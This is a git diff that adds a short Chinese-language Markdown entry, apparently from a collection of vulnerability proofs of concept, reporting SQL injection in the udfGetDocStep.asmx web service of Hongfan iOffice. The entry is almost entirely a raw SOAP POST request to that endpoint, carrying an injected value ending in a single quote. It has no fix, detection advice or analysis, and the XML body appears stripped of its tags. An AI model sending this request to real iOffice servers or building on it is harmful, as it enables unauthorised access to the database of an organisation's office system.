diff --git a/红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞.md b/红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞.md new file mode 100644 index 0000000..0d02693 --- /dev/null +++ b/红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞.md @@ -0,0 +1,18 @@ +## 红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞 + +## POC +``` +POST /ioffice/prg/interface/udfGetDocStep.asmx HTTP/1.1 +Host: +Content-Type: text/xml; charset=utf-8 +SOAPAction: "http://tempuri.org/GetDocStep" + + + + + + 1' + + + +```